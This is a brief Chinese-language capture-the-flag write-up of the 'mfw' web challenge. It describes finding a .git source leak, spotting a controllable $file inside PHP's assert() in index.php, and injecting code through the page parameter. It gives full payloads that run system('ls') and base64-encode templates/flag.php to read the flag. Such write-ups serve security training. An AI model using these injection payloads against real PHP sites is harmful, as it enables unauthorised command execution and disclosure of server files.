mfw
mfw是什么东西???
看题:
进来只有几个标签,挨着点一遍,到About页面
看到了Git,猜测有git泄露,访问/.git/HEAD成功
上Githack,但是会一直重复
按了一次ctrl+c就好了
有没有哪位大哥知道这是什么问题
然后用git log 和 git diff试了一下,什么都没有,只好去看看代码
看到index.php的时候
发现assert里面的$file是可控的,所以可以进行命令注入
尝试?page=flag.php','..')==false and system('ls') and strpos('templates/flag
有回显,这里重复两次是因为红框下面还有一句assert
尝试爆flag?page=flag.php','..')==false and system('cat templates/flag.php') and strpos('templates/flag
!!!竟然没显示,然后试了好多都不行,最后想到返回php文件会因为特殊符号而报错,所以使用base64
payload:flag.php','..')==false and system('cat templates/flag.php | base64') and strpos('templates/flag
